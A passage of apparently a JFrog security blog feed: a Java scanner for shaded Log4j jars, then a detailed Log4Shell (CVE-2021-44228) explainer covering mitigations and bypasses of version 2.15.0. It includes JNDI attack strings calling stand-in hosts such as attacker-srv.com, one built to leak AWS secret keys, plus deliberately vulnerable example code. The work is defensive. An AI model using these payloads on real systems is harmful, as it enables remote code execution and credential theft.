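import java.util.Enumeration;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

public class ShadedLog4jScanner {
    // Class entry whose presence indicates Log4j code was bundled directly (shaded).
    static final String JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class";

    /** Returns true if the given .jar contains the JndiLookup class entry. */
    static boolean containsJndiLookup(Path jar) throws IOException {
        try (ZipFile zf = new ZipFile(jar.toFile())) {
            for (Enumeration<? extends ZipEntry> e = zf.entries(); e.hasMoreElements(); ) {
                if (e.nextElement().getName().equals(JNDI_LOOKUP)) {
                    return true;
                }
            }
        }
        return false;
    }

    public static void main(String[] args) throws IOException {
        for (String arg : args) {
            Path jar = Paths.get(arg);
            System.out.println(jar + ": "
                    + (containsJndiLookup(jar) ? "contains shaded Log4j JndiLookup" : "clean"));
        }
    }
}
```

A production scanner would also recurse into nested jars (fat jars inside fat jars) and match class bytecode rather than entry names, but the core idea is the same: look inside the artifact, not just at its declared dependencies.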

Log4j Inclusion In Packages – Findings in Maven Central

In previous research, approximately 17,000 Java packages in the Maven Central repository were found to contain the vulnerable log4j-core library as a direct or transitive dependency. Our investigation was focused on identifying additional packages containing the Log4j vulnerability that would not be detected through dependency scanning – namely, packages containing vulnerable Log4j code within the artifact itself.

We surveyed the latest versions of packages in Maven Central to get some sense of the numbers involved. Overall, direct inclusion of Log4j code in artifacts is not as common as the use of Log4j through dependencies. However, it still adds up to hundreds (~400) of packages which directly include Log4j code, opening these packages to Log4j vulnerabilities. In more than half of these cases (~65%), Log4j code is included directly as classes (i.e. shading), while the remainder bundle complete Log4j .jar files (i.e. fat jars). These numbers indicate that tools looking for complete .jar files only will miss most of the cases where Log4j is included directly.

Another interesting metric to investigate is the number of cases where Log4j is included in the artifact, but also as a transitive dependency. There is no direct link between the two notions: code inclusion may result from the requirements of one bundled library, and another may require Log4j as an external dependency. From our observations, in ~30% of the cases where Log4j code is included directly in an artifact as classes and not a complete .jar file, it also does not show up in the transitive dependencies list of the artifact. These cases will not be found by tools that look for explicit mentions of library names in the dependency tree, or the inclusion of complete .jar files.

Recommendations

The JFrog Security Research team is recommending all developers take extra caution and carefully check whether their software products use unpatched versions of Log4j2, both in the first-party code they developed and in the third-party code used in their applications.

We recommend using automated deep scanning tools to accelerate and simplify the detection of the Log4j vulnerability while making sure all possible ways of including Log4j in the released artifacts are covered.

Want to learn more about the Log4j vulnerability and how it affects you?

Check out these additional resources from the JFrog Security Research Team:
Log4Shell 0-Day Vulnerability: All You Need To Know – Blog
Log4j Log4Shell Vulnerability Explained – Webinar
Log4j Log4Shell Vulnerability Q&A – Blog
Log4j Detection with JFrog OSS Scanning Tools – Blog

]]>
Log4j Log4Shell 0-Day Vulnerability: All You Need To Know https://jfrog.com/blog/log4shell-0-day-vulnerability-all-you-need-to-know/ Tue, 28 Dec 2021 03:00:02 +0000 https://jfrog.com/?p=86007 Log4Shell Vulnerability Explained

On Thursday, Dec 9th 2021, a researcher from the Alibaba Cloud Security Team dropped a zero-day remote code execution exploit on Twitter, targeting the extremely popular log4j logging framework for Java (specifically, the 2.x branch called Log4j2). The vulnerability was originally discovered and reported to Apache by the Alibaba cloud security team on November 24th. MITRE assigned CVE-2021-44228 to this vulnerability, which has since been dubbed Log4Shell by security researchers.


JFrog Releases OSS Tools for Identifying Log4J Utilization & Risk
Get the Scanning Tools

Since December 9th, the Log4j vulnerability has been reported to be massively exploited in the wild, due to the fact that it is trivially exploitable (weaponized PoCs are available publicly) and extremely popular, and it has received wide coverage in the media and on social networks.

In this technical blog post, we will clarify the exploitation vectors for this issue, provide accurate research-backed novel information on exactly what is vulnerable (as some reports have been inaccurate), suggest Log4j vulnerability remediations for vendors that cannot easily upgrade their log4j version and answer some burning questions that we’ve been asked on this vulnerability (such as the efficacy of some suggested mitigations floating around in the last couple of days).

Note: JFrog products are not affected, as they are not using the log4j-core package.

 

What causes the Log4j Log4Shell vulnerability?

By default, Log4j2 supports a logging feature called “Message Lookup Substitution”. This feature enables certain special strings to be replaced, at the time of logging, by other dynamically-generated strings. For example, logging the string Running ${java:runtime} will yield an output similar to:

Running Java version 1.7.0_67

It has been discovered that one of the lookup methods, specifically the JNDI lookup paired with the LDAP protocol, will fetch a specified Java class from a remote source and deserialize it, executing some of the class’s code in the process.

This means that if any part of a logged string can be controlled by a remote attacker, the remote attacker gains remote code execution on the application that logged the string.
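To make the mechanism concrete, here is a deliberately simplified, hypothetical re-implementation of the substitution idea (this is illustrative only, not Log4j2’s actual code): tokens of the form ${prefix:key} are resolved at the moment the message is logged, which is exactly why attacker-controlled input inside a log message is dangerous.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class ToyLookup {
    static final Pattern TOKEN = Pattern.compile("\\$\\{([a-z]+):([^}]*)\\}");

    // Resolve ${prefix:key} tokens in a message at "log time".
    // A real implementation dispatches to many lookup sources (env, sys, jndi, ...);
    // the JNDI branch is the one that made CVE-2021-44228 remotely exploitable.
    static String substitute(String message) {
        Matcher m = TOKEN.matcher(message);
        StringBuffer out = new StringBuffer();
        while (m.find()) {
            String prefix = m.group(1), key = m.group(2);
            String resolved;
            switch (prefix) {
                case "sys":  resolved = System.getProperty(key, ""); break;
                case "env":  resolved = System.getenv().getOrDefault(key, ""); break;
                case "jndi": resolved = "<would perform a JNDI lookup to " + key + ">"; break;
                default:     resolved = m.group(0); // unknown prefix: leave as-is
            }
            m.appendReplacement(out, Matcher.quoteReplacement(resolved));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        // Attacker-controlled "User-Agent" ends up inside the logged string:
        System.out.println(substitute("Request UA: ${jndi:ldap://attacker.com/a}"));
    }
}
```

In real Log4j2 the jndi branch does not print a placeholder – it performs the lookup, which with LDAP can fetch and deserialize a remote class.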

The most common substitution string that takes advantage of this issue will look similar to:

${jndi:ldap://somedomain.com}

Note that the following protocols may also be used for exploiting this issue (some of them may not be available by default) –

${jndi:ldaps://somedomain.com}

${jndi:rmi://somedomain.com}

${jndi:dns://somedomain.com} (Allows detecting vulnerable servers, does not lead to code execution.)

The basic attack flow can be summarized by the following diagram:

Log4j log4shell vulnerability attack flow


Learn all about the Log4j vulnerability directly from our security research team!
Watch Log4shell on-demand Webinar

Why is Log4Shell so dangerous?

The vulnerability, which received the highest CVSS score possible – 10.0 – is extremely dangerous due to a number of factors:

  1. Exploitation of the vulnerability is trivial, with tons of weaponized exploits available on GitHub and other public sources. 
  2. Log4j2 is one of the most popular Java logging frameworks. There are currently almost 7,000 Maven artifacts that depend on log4j-core (the vulnerable artifact), and there are countless other Java projects that use it.
  3. The vulnerability can easily be used in a drive-by-attack scenario by bombarding random HTTP servers with requests similar to:

GET / HTTP/1.1

Host: somedomain.com

User-Agent: ${jndi:ldap://attacker-srv.com/foo}

Or alternatively, a specific webapp can be brute-forced by filling all available HTML input fields with the payload string, using automated tools such as XSStrike.

  4. Although the vulnerability is context-dependent, since arbitrary user input must reach one of the Log4j2 logging functions (see next section), this scenario is extremely common. In most logging scenarios, part of the log message contains input from the user, and such input is rarely sanitized since logging it is considered safe.

When exactly is the Log4j vulnerability exploitable?

All of the following conditions must apply in order for a specific Java application to be vulnerable:

  • The Java application uses log4j (Maven package log4j-core) version 2.0.0-2.12.1 or 2.13.0-2.14.1
    • Version 2.12.2 is not vulnerable, since it received backported fixes from 2.16.0.
  • A remote attacker can cause arbitrary strings to be logged, via one of the logging APIs – logger.info(), logger.debug(), logger.error(), logger.fatal(), logger.log(), logger.trace(), logger.warn()
  • No Log4j-specific mitigations have been applied (see the next “Mitigations” section).
  • (on some machines) The Java JRE / JDK version in use is older than the following versions:
    • 6u211
    • 7u201
    • 8u191
    • 11.0.1

This is due to the fact that later versions set the JVM property com.sun.jndi.ldap.object.trustURLCodebase to false by default, which disables JNDI loading of classes from arbitrary URL code bases.
Note that relying only on a new Java version as protection against this vulnerability is risky, since the vulnerability may still be exploited on machines that contain certain “gadget” classes in the classpath of the vulnerable application. See Appendix B – “Exploiting Log4Shell in newer Java versions.”
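The version conditions above can be checked mechanically. A small sketch (our own helper, assuming plain x.y.z version strings and the ranges stated in this post) flags 2.0.0 – 2.12.1 and 2.13.0 – 2.14.1 as vulnerable while exempting the backported 2.12.2 fix:

```java
public class Log4jVersionCheck {
    /** Returns true if the given log4j-core version is in a CVE-2021-44228-vulnerable range. */
    static boolean isVulnerable(String version) {
        String[] p = version.split("\\.");
        int major = Integer.parseInt(p[0]);
        int minor = Integer.parseInt(p[1]);
        int patch = p.length > 2 ? Integer.parseInt(p[2]) : 0;
        if (major != 2) return false;                // only the 2.x branch is affected
        if (minor == 12 && patch >= 2) return false; // 2.12.2 received backported fixes
        return minor < 15;                           // 2.0.0 - 2.12.1 and 2.13.0 - 2.14.1
    }

    public static void main(String[] args) {
        for (String v : new String[] {"2.14.1", "2.12.2", "2.16.0"}) {
            System.out.println(v + " vulnerable? " + isVulnerable(v));
        }
    }
}
```

Remember that even a “not vulnerable” result here only covers the version condition – the remaining conditions (attacker-controlled logged strings, no mitigations applied) still apply.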

Are JFrog products vulnerable?

It’s important to note that JFrog Security has validated that JFrog Platform solutions themselves are not affected, as no products, including Artifactory, Xray, JFrog Distribution, Insight, Access or Mission Control, are using the log4j-core package.

For avoidance of doubt, JFrog products are not affected by any of the following CVEs –

  • CVE-2021-44228
  • CVE-2021-45046
  • CVE-2021-45105
  • CVE-2021-44832

I’m using the log4j-api package, am I vulnerable?

Note that some advisories claimed the Maven package log4j-api was vulnerable to this issue. JFrog’s security research team looked into this claim and concluded that log4j-api (by itself) is not vulnerable. This is due to the lack of JndiLookup functionality, and can be easily seen by trying to trigger the vulnerable code. 

Are log4j-api package users affected by Log4Shell?

Running this code with only log4j-api installed yielded the following output:

ERROR StatusLogger Log4j2 could not find a logging implementation. Please add log4j-core to the classpath. Using SimpleLogger to log to the console...

When running the same code with the SimpleLogger class, the lookup string is logged verbatim, but no lookup code is triggered (since it does not exist.)

How can I completely fix the Log4j Log4shell issue?

The best fix for this issue would be to upgrade your log4j dependencies to version 2.16.0, which completely resolves the issue by disabling JNDI by default and removing support for message lookups.

Upgrading to version 2.15.0 will also completely shield default configurations from remote exploitation, although most of the mitigations added by version 2.15.0 have already been bypassed (See Appendix D). To remain future-proof we recommend upgrading to 2.16.0 as soon as possible.

Can I mitigate the Log4shell vulnerability without upgrading a version?

Although we recommend fixing the vulnerability completely by upgrading the log4j version to a fixed version, it is possible to completely mitigate the issue without upgrading:

Method 1: For log4j 2.10.0 and later versions – Disabling lookups:

Update – This mitigation method can be bypassed in rare non-default configurations, via CVE-2021-45046. See Appendix C for more information. We still recommend vendors that cannot upgrade to a newer Log4j2 version to use both this mitigation method and mitigation method 2 specified below. Mitigation method 2 (removing the vulnerable class) is not affected by CVE-2021-45046.

If using log4j 2.10.0 or any later version, we recommend disabling message lookups globally by setting the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true by executing this command before Java applications are loaded in one of the system’s init scripts:

export LOG4J_FORMAT_MSG_NO_LOOKUPS=true

This can also be done system-wide by editing the /etc/environment file and adding:

LOG4J_FORMAT_MSG_NO_LOOKUPS=true

This method can be used as an additional protection layer in case you suspect not all dependencies have been properly updated, and even to protect against third-party Java packages that depend on or embed a vulnerable version of Log4j and have not been properly patched yet.

Alternatively, lookups can be disabled for a specific invocation of the JVM by adding the following command-line flag when running the vulnerable Java application: -Dlog4j2.formatMsgNoLookups=true

For example –

java -Dlog4j2.formatMsgNoLookups=true -jar vulnerable.jar

Method 2 – For all 2.x versions: removing the vulnerable class

On all log4j 2.x versions, it is possible to remove the JndiLookup class from any Java applications by executing this command:

find ./ -type f -name "log4j-core-*.jar" -exec zip -q -d "{}" org/apache/logging/log4j/core/lookup/JndiLookup.class \;

This will recursively find all log4j-core JAR files, starting from the current directory, and remove the vulnerable JndiLookup class from them. For full coverage, the command may be executed from the root directory of your project or server.

Note: This method is recommended only as a last resort, since the vulnerable JndiLookup class may be embedded in nested JAR files or in locations that the zip command cannot access. When choosing this method, it is highly recommended to verify manually that no JndiLookup classes are available to any Java application.

How can I use JFrog Xray to detect the Log4shell vulnerability?

Xray customers can scan artifacts as usual to detect CVE-2021-44228. As always, this can be done through CI/CD. 

Log4shell CVE-2021-44228

The JFrog CLI:

Log4shell detecting CVE-2021-44228 in JFrog CLI

Or the JFrog IDE plugin:

Log4shell detecting CVE-2021-44228 in JFrog IDE


Book a demo of the Xray security tool!
Book a Demo

Appendix A – Vulnerable Example

Example application that will be vulnerable to remote exploitation (from LunaSec’s advisory):

 

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

import com.sun.net.httpserver.HttpExchange;
import com.sun.net.httpserver.HttpHandler;

import java.io.IOException;
import java.io.OutputStream;

public class VulnerableLog4jExampleHandler implements HttpHandler {

  static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());

  /**
   * A simple HTTP endpoint that reads the request's User-Agent and logs it back.
   * This is basically pseudo-code to explain the vulnerability, and not a full example.
   * @param he HTTP Request Object
   */
  public void handle(HttpExchange he) throws IOException {
    String userAgent = he.getRequestHeaders().getFirst("User-Agent");

    // This line triggers the RCE by logging the attacker-controlled HTTP User-Agent header.
    // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
    log.info("Request User Agent:{}", userAgent);

    String response = "Hello There, " + userAgent + "!";
    he.sendResponseHeaders(200, response.length());
    OutputStream os = he.getResponseBody();
    os.write(response.getBytes());
    os.close();
  }
}

 

Appendix B – Exploiting Log4Shell in newer Java versions

Method 1 – Abusing other message lookups

Although JNDI remote class loading is disabled in newer Java versions, the message lookup mechanism itself still works, and can be abused for various purposes:

  1. As mentioned before, using a string such as ${jndi:dns://dnsserver.com/somedomain} will cause the victim to send a DNS query to dnsserver.com (querying the somedomain DNS record). This can be used to detect vulnerable log4j instances, tunnel data back, or even mount a DDoS attack (given enough vulnerable services).
  2. There are several lookup substitutions that reveal sensitive information from the victim machine. Most prominently, using the attack string ${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.attacker-srv.com/foo} (with any protocol type) may leak the machine’s secret AWS access key, if this environment variable was exported to the vulnerable log4j process. Naturally, the attack string can be modified to leak any environment variable present in the vulnerable log4j process. Other interesting information-leaking lookups include:
    1. ${main:x} – leak the value of command line argument #x, which may contain sensitive data such as passwords or access keys passed through the command line.
    2. ${sys:propname} – leak the value of a Java System Property. For example this can be used to leak the current username (user.name):

Log4Shell – identifying the security breach – leaked username

Method 2 – Abusing factory classes in the local classpath

As thoroughly explained in this Veracode blog post, there are ways to exploit JNDI injections even on newer versions of Java, where remote deserializations are disabled.

For example, if the org.apache.naming.factory.BeanFactory class (which is usually shipped with Apache Tomcat servers) is available in the classpath of the vulnerable application that uses log4j, then the Log4Shell vulnerability can be exploited for remote code execution, regardless of the underlying JRE/JDK version.

This is due to the fact that even though newer versions of Java will not deserialize remote arbitrary classes, the attacker can still control the factory class and its attributes, through the supplied JNDI Reference:

Exploiting the Log4Shell vulnerability through a factory class – Apache BeanFactory example

The remote attacker cannot supply an arbitrary factory class, but can reuse any factory class in the vulnerable program’s classpath as a gadget.

A usable factory class would have the following properties: 

  • Exist in the vulnerable program’s classpath
  • Implement the ObjectFactory interface
  • Implement the getObjectInstance method
  • Perform dangerous actions with the Reference’s attributes

The researchers identified that the BeanFactory class fits the bill, due to its dangerous use of reflection – arbitrary Java objects are created, based solely on the Reference’s string attributes, which are attacker-controlled.

The blog references full exploit code for hosting an RMI server with the proper Reference that can be used to exploit Log4shell in newer Java versions, on machines where the BeanFactory class is available in the vulnerable application’s classpath.

Note that the Log4Shell attack string for using such a server will be similar to –

${jndi:rmi://attacker-srv.com/foo}

However, the provided RMI server can also be converted to a ldap or ldaps server, in which case the attack string will change accordingly.

Since other “factory gadgets” such as the BeanFactory class may be found in the future, we highly suggest not relying on a newer Java version as the only line of defense against Log4Shell, and upgrading log4j and/or implementing some of our proposed mitigations.

Method 3 – Using serialized Java Objects with local gadget classes

As mentioned above, the naive attack vector will instruct the vulnerable Log4j2-based application to retrieve a remote serialized class, usually via LDAP, and load it – allowing the attacker full control over the contents of the class.

However, LDAP also supports sending a serialized Java Object (instance of a class) in the LDAP request itself, by using the javaSerializedData attribute.
Deserializing the Object is only possible if the Object’s class is available in the current classpath (a list of directories and JAR files that’s searched for classes).
An important distinction is that when deserializing an object, the trustURLCodebase security mitigation has no effect, since that specific mitigation only prevents loading of new codebases.

It is well-known that some specific Objects can directly lead to remote code execution when they are deserialized – the classes that these Objects are based on are colloquially called “gadgets”.
For example –  the ysoserial proof-of-concept tool aggregates some of these well known gadgets, and allows generation of Objects with arbitrary code execution payloads.

Therefore – an attacker that knows that a specific “gadget” class is present in the vulnerable application’s classpath can generate such an Object, send it through LDAP via the javaSerializedData attribute, and gain code execution when it is deserialized, regardless of the trustURLCodebase mitigation.

Furthermore – due to the information-leaking properties of the vulnerability mentioned above, an attacker may be able to build a fully-automated tool that first queries specific system properties from the vulnerable application (through the use of recursive lookups), determines whether any gadget classes are present in the vulnerable application, and then builds a target-specific payload to gain remote code execution.

To date, we have not seen such a tool publicly available or used in the wild, but unfortunately we believe that this malicious campaign is still far from over.

 

Appendix C – Bypassing the LOG4J_FORMAT_MSG_NO_LOOKUPS mitigation by using CVE-2021-45046

We would like to preface this section by saying that the prerequisites for performing this bypass are highly unlikely, and as such we still consider the LOG4J_FORMAT_MSG_NO_LOOKUPS mitigation effective in the vast majority of cases.

Due to the disclosure of CVE-2021-45046, it was revealed that one of the suggested mitigation techniques, namely – disabling the message lookup mechanism, can be bypassed in certain non-default configurations.

The bottom line is – if CVE-2021-45046 can be exploited on Log4j2 2.10.0 – 2.14.1 (inclusive), it allows the attacker to bypass both the LOG4J_FORMAT_MSG_NO_LOOKUPS environment variable mitigation and the log4j2.formatMsgNoLookups system property mitigation.

So – what are the conditions for the exploitation of CVE-2021-45046?

(Credit to community project log4shell-vulnerable-app that implemented similar example conditions)

  1. A new (non-default) pattern layout must be added to the Log4j2 configuration. The pattern layout must use a Context Lookup (${ctx:). An example of a vulnerable log4j2.properties file –

    # vulnerable in 2.14.1 even with ENV LOG4J_FORMAT_MSG_NO_LOOKUPS true
    appender.console.layout.pattern = ${ctx:useragent} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n

    Note that the Log4j2 configuration can be specified in many different ways, but in any case there are no default Context Lookup pattern layouts –

    Configuration of Log4j2

  2. The vulnerable application must use a Thread Context Map, where the attacker has control of the input data, for example:

    public void handle(HttpExchange he) throws IOException {
        // userAgent is attacker-controlled
        String userAgent = he.getRequestHeaders().getFirst("User-Agent"); 
         
        // Note that 1st argument matches the variable name from the configured pattern
        ThreadContext.put("useragent", userAgent); 
         
        // The log message itself doesn't need to contain any message lookup
        log.info("Received a request with User-Agent");
        ...

In case both of these conditions exist, an attacker can send an attack token “as usual” – for example in this case, the attacker may send an HTTP request such as –

GET / HTTP/1.1
Host: somedomain.com
User-Agent: ${jndi:ldap://attacker-srv.com/foo}

and code execution will occur, despite the LOG4J_FORMAT_MSG_NO_LOOKUPS mitigation.

 

Update #1 – more examples of vulnerable patterns, as tweeted by @pwntester –

MapMessage

Example pattern layout:

appender.console.layout.pattern = ${map:tainted} ...

Example Java code passing user-controlled data (TAINTED):

MapMessage msg = new StringMapMessage().with("message", "H").with("tainted", TAINTED);
logger.error(msg);

 

Jackson (only if Jackson is in the application’s classpath)

Example pattern layout:

appender.console.layout.pattern = ${map:tainted} ...

Example Java code passing user-controlled data (TAINTED):

logger.info(new ObjectMessage(TAINTED));

StructuredDataMessage

Example pattern layout:

appender.console.layout.pattern = ${sd:tainted} ...

Example Java code passing user-controlled data (TAINTED):

StructuredDataMessage m = new StructuredDataMessage("1", "H", "event");
m.put("tainted", TAINTED);
logger.error(m);

 

Update #2 – Even more examples of vulnerable patterns, discovered and validated by the JFrog security research team –

Environment

Example pattern layout:

appender.console.layout.pattern = ${env:TAINTED_ENV_VAR} ...

 

Main Arguments

Example pattern layout:

appender.console.layout.pattern = ${main:0} ...

Example Java code passing user-controlled data (TAINTED):

MainMapLookup.setMainArguments(args);
logger.error("foo");

 

Event (Message)

Example configuration:


<?xml version="1.0" encoding="UTF-8"?> 
<Configuration status="WARN" name="RoutingTest"> 
  <Appenders> 
    <Routing name="Routing"> 
      <Routes> 
        <Route pattern="aaa"> 
          <Console name="STDOUT"> 
            <PatternLayout> 
              <pattern>${event:Message} ... </pattern> 
            </PatternLayout> 
          </Console> 
        </Route> 
      </Routes> 
    </Routing> 
  </Appenders> 
  <Loggers> 
    <Root level="error"> 
      <AppenderRef ref="Routing" /> 
    </Root> 
  </Loggers> 
</Configuration>

 This will effectively turn message lookups back on. As such, exploitation can be performed similarly to older Log4j versions - logger.info("${jndi:ldap://attacker.com/foo}");

 

Appendix D – Exploiting Log4j2 2.15.0 for remote code execution

Log4j2 2.15.0 added a few important mitigations to deny exploitation of Log4Shell (CVE-2021-44228). These are the added mitigations and their current bypass status –

    1. Message lookups are disabled by default – Can be bypassed in specific configurations (CVE-2021-45046 and more)

    2. allowedJndiProtocols – JNDI only allows the following protocols by default – LDAP, LDAPS, Java (local) – No known bypass

    3. allowedLdapHosts – JNDI over LDAP may only access the local host by default (127.0.0.1/localhost) – Can be bypassed in specific operating systems (macOS, FreeBSD, Fedora, Arch Linux and Alpine Linux)

    4. allowedLdapClasses – JNDI over LDAP may only load Java primitive classes by default – Can always be bypassed

 

Due to the bypasses of mitigations #3 and #4, CVE-2021-45046 was upgraded from “Low” (3.7) severity to “Critical” (9.0) severity, since exploiting it immediately leads to RCE. That being said, as we mentioned above we still consider the prerequisites for the exploitation of CVE-2021-45046 as highly unlikely, due to them requiring a rare non-default configuration.

Here are some more details about the specific bypasses –

Message lookups are disabled by default

This mitigation can be bypassed by –

    1. Any one of the configurations specified in Appendix C

    2. The application explicitly allowing message lookups, by defining a pattern layout containing %m{lookups} in one of the configuration files. For example – appender.console.layout.pattern = %m{lookups}

 

As mentioned, bypassing this mitigation in Log4j2 2.15.0 currently directly leads to RCE.

 

JNDI over LDAP may only access the local host by default

As tweeted by @marcioalm, an attack string similar to ${jndi:ldap://127.0.0.1#evilhost.com:1389/a} will bypass the localhost restriction, but end up contacting the remote evilhost.com. We were able to reproduce this bypass only when the vulnerable application runs on macOS and FreeBSD. External sources have also reported Fedora, Arch Linux and Alpine Linux as vulnerable. On other operating systems, Java throws an UnknownHostException (tested on Ubuntu, Debian & Windows).
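The reason the allow-list lets this string through is easy to demonstrate with standard URI parsing: everything after the # is treated as a fragment, so a check based on the parsed host only ever sees 127.0.0.1. (What the OS resolver later does with the full authority string is the platform-specific part of the bypass; this snippet only shows why the check passes.)

```java
import java.net.URI;
import java.net.URISyntaxException;

public class HostCheckDemo {
    /** Returns the host that an allow-list check based on URI.getHost() would see. */
    static String checkedHost(String url) throws URISyntaxException {
        return new URI(url).getHost();
    }

    public static void main(String[] args) throws Exception {
        String attack = "ldap://127.0.0.1#evilhost.com:1389/a";
        // '#' starts the URI fragment, so the authority (and thus the host) is just 127.0.0.1.
        System.out.println("checked host = " + checkedHost(attack));
        System.out.println("fragment     = " + new URI(attack).getFragment());
    }
}
```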

 

JNDI over LDAP may only load Java primitive classes by default

Note that both of the following bypasses will work on version 2.16.0 as well, if JNDI has been enabled by a non-default configuration

Bypass #1 – Time-of-check, Time-of-use attack

This vulnerability was independently discovered and disclosed to Apache by JFrog’s security research team and other security researchers.

The class-loading mitigation introduced in version 2.15.0 first inspects the requested LDAP attributes by calling getAttributes and later loads the class/object specified by LDAP by calling lookup:


if (LDAP.equalsIgnoreCase(uri.getScheme()) || LDAPS.equalsIgnoreCase(uri.getScheme())) {
	if (!allowedHosts.contains(uri.getHost())) {
		LOGGER.warn("Attempt to access ldap server not in allowed list");
		return null;
	}
	// GET THE CLASS ATTRIBUTES
	Attributes attributes = this.context.getAttributes(name);
	if (attributes != null) {
		// CLASS LOADING CHECKS HERE
		...
	}
	...
}
...
// LOAD THE CLASS
return (T) this.context.lookup(name);
...

However – both the getAttributes and lookup calls will cause separate LDAP requests to be sent, and a malicious server is not required to send back the same LDAP response for both requests.

Therefore – an attacker can easily implement an LDAP server which operates as follows –

  • On LDAP request #1 – Send back a response with NULL attributes (will cause the package code to skip all attributes checking)
  • On LDAP request #2 – Send back a malicious response (ex. the attacker’s URL in javaCodeBase)

Log4shell vulnerability - Time-of-Check, Time-of-Use (ToCToU) attack

This is a classic Time-of-Check, Time-of-Use (ToCToU) attack, albeit without a race condition as the attacker’s server is consulted synchronously.

Advantages – Does not rely on a “gadget” class being available in the classpath of the vulnerable application
Disadvantages – Loading a remote codebase is blocked in newer Java versions (where trustURLCodebase is false)

Bypass #2 – Using serialized objects with a forged name

When deserializing an embedded Java object, the check for the object’s class was implemented in an incomplete manner, since the class comparison is done by name only:


if (attributeMap.get(SERIALIZED_DATA) != null) {
	if (classNameAttr != null) {
		String className = classNameAttr.get().toString();
		if (!allowedClasses.contains(className)) {
			LOGGER.warn("Deserialization of {} is not allowed", className);
			return null;
		}

Therefore – an attacker can specify an arbitrary serialized object in the LDAP response, but set the javaClassName to one of the primitive types to bypass the check:

private static final List permanentAllowedClasses = Arrays.asList(Boolean.class.getName(),
	Byte.class.getName(), Character.class.getName(), Double.class.getName(), Float.class.getName(),
	Integer.class.getName(), Long.class.getName(), Short.class.getName(), String.class.getName());
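The flaw reduces to a name-only comparison: the allow-list is consulted with an attacker-supplied javaClassName attribute, while nothing ties that name to the class actually encoded in the serialized bytes. A toy model of the broken check (our own simplification, not the actual Log4j code):

```java
import java.util.Arrays;
import java.util.List;

public class ForgedNameCheck {
    static final List<String> ALLOWED = Arrays.asList(
            "java.lang.Boolean", "java.lang.Integer", "java.lang.String");

    // Models the 2.15.0 check: it trusts the attacker-controlled javaClassName
    // attribute; nothing verifies it against the class in javaSerializedData.
    static boolean checkPasses(String claimedClassName) {
        return ALLOWED.contains(claimedClassName);
    }

    public static void main(String[] args) {
        // Attacker claims the payload is an Integer while shipping a gadget object:
        System.out.println(checkPasses("java.lang.Integer"));
    }
}
```

A robust check would have to compare against the deserialized object's actual class, not a self-declared name.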

Similarly to the previous serialized object bypass, this relies on the victim having the appropriate “gadget” class of the serialized object in the local classpath.

Advantages – Works on newer Java versions (where trustURLCodebase is false)
Disadvantages – Relies on a “gadget” class being available in the classpath of the vulnerable application
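To make the flaw concrete, here is a minimal sketch (hypothetical names, not the actual package code) of why an allow-list keyed on the attacker-supplied javaClassName attribute is trivially bypassable:

```java
import java.util.Arrays;
import java.util.List;

// Hedged illustration: the claimed class name is attacker-controlled metadata,
// completely independent of the class actually encoded in the serialized bytes.
public class NameOnlyCheck {
    static final List<String> ALLOWED = Arrays.asList(
            Boolean.class.getName(), String.class.getName());

    // Mirrors the vulnerable pattern: trusts the javaClassName attribute alone.
    static boolean passesCheck(String claimedClassName) {
        return ALLOWED.contains(claimedClassName);
    }

    public static void main(String[] args) {
        // The serialized payload can encode any gadget class; the attacker
        // simply claims it is a java.lang.String.
        String claimed = String.class.getName();
        System.out.println(passesCheck(claimed)); // true — check bypassed
    }
}
```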

 

Appendix E –

Impact analysis of CVE-2021-45105 in Log4j2

Recently, a new denial of service CVE in Log4j2 was published – CVE-2021-45105, with CVSS 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). The JFrog security team has validated the CVE data and claims on version 2.16.0, and estimated a CVSS of 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). This estimation is based on the following –

CVE-2021-45105 Prerequisites

Although not explicitly specified in the CVE, the prerequisites for this attack are exactly the same as for CVE-2021-45046 – namely, the attacker must control a non-message part of one of the pattern layouts. Therefore, the exploitation case mentioned in the CVE (“attacker with control over Thread Context Map”) is only one of the applicable cases. In reality, an attacker can abuse any non-default configuration as specified in Appendix C. For example, a configured pattern with a MapMessage will also make the application vulnerable to this CVE (as long as the attacker controls the tainted variable):

appender.console.layout.pattern = ${map:tainted} - %-5p %c{1}:%L - %m%n

From our perspective, the requirement for such a non-default (and unlikely) configuration raises the attack complexity of this issue to “High”.

Denial-of-Service impact

Running the public exploit string – ${::-${::-${}}} – on a vulnerably-configured Log4j2 version 2.16.0 yields an IllegalStateException. The PoC string does not cause any excessive CPU or memory usage, and as such the DoS impact (if any) should not have any system-wide effect. Since by default exceptions are ignored in Log4j2 Appenders (logged only, not thrown), the thrown exception does not crash the server, and as such the DoS impact is completely mitigated:

private void handleAppenderError(final LogEvent event, final RuntimeException ex) {
    appender.getHandler().error(createErrorMsg("An exception occurred processing Appender "), event, ex);
    if (!appender.ignoreExceptions()) { // ignoreExceptions=true, by default
        throw ex;
    }
}

Official Fix

The issue can be fixed by upgrading Log4j2 to version 2.17.0.

The official fix (version 2.17.0) changes the StrSubstitutor logic to handle the PoC’s edge case, and does not throw any exceptions when faced with similar input.
For legacy (Java 7) users, it has been hinted that version 2.12.3 will be released to fix this issue, although at the time of writing no such version is available.

 

Mitigations of CVE-2021-45105

Note that this issue is not related to JNDI, and as such all previous proposed mitigations (ex. removing the JndiLookup class) will not mitigate this issue.

To mitigate this issue, in non-default cases where the exception is not ignored, vendors can wrap the logging code with an exception handler, so that DoS will not occur.
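As a minimal sketch of that mitigation (the brittle logger below merely simulates a substitution bug, and logSafely is a hypothetical helper, not a Log4j2 API):

```java
import java.util.function.Consumer;

public class SafeLogging {
    // Wraps a logging call so that a RuntimeException thrown by the logging
    // framework (e.g. a string-substitution bug) cannot crash the application.
    static void logSafely(Consumer<String> logCall, String message) {
        try {
            logCall.accept(message);
        } catch (RuntimeException e) {
            System.err.println("Logging failed: " + e.getMessage());
        }
    }

    public static void main(String[] args) {
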